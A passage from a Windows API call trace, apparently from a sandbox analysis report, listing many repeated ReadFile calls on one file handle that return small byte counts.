ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.851] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.851] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x7, lpOverlapped=0x0) returned 1 [0050.852] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.852] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.852] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.853] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x7, lpOverlapped=0x0) returned 1 [0050.853] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.854] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.854] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.854] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x13, lpOverlapped=0x0) returned 1 [0050.855] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.855] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.855] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.856] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x7, lpOverlapped=0x0) returned 1 [0050.856] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.856] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.857] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.857] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x3, lpOverlapped=0x0) returned 1 [0050.858] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.858] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x2, lpOverlapped=0x0) returned 1 [0050.858] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.859] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x9, lpOverlapped=0x0) returned 1 [0050.859] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.859] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.860] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.860] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x3, lpOverlapped=0x0) returned 1 [0050.861] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.861] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.861] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.862] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x8, lpOverlapped=0x0) returned 1 [0050.862] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.862] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.863] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.863] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.863] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.864] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.864] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.864] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x7, lpOverlapped=0x0) returned 1 [0050.865] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.865] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.866] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.866] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x7, lpOverlapped=0x0) returned 1 [0050.866] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.867] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.867] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.867] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x13, lpOverlapped=0x0) returned 1 [0050.868] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.868] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.868] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.869] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x7, lpOverlapped=0x0) returned 1 [0050.869] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.870] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.870] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.870] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x3, lpOverlapped=0x0) returned 1 [0050.871] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.871] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x2, lpOverlapped=0x0) returned 1 [0050.871] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.872] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0xb, lpOverlapped=0x0) returned 1 [0050.872] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.872] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.873] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.873] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x3, lpOverlapped=0x0) returned 1 [0050.874] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.874] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.874] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.875] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x8, lpOverlapped=0x0) returned 1 [0050.875] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.875] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.876] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.876] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.877] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.877] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.877] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.878] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x7, lpOverlapped=0x0) returned 1 [0050.878] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.878] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.879] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.879] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x7, lpOverlapped=0x0) returned 1 [0050.879] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.880] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.880] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.880] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x13, lpOverlapped=0x0) returned 1 [0050.881] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.881] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.882] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.882] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x7, lpOverlapped=0x0) returned 1 [0050.882] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.883] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.883] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.883] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x3, lpOverlapped=0x0) returned 1 [0050.884] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.884] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x2, lpOverlapped=0x0) returned 1 [0050.884] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.891] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x9, lpOverlapped=0x0) returned 1 [0050.891] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.891] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.892] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.892] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x3, lpOverlapped=0x0) returned 1 [0050.892] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.893] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.893] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, 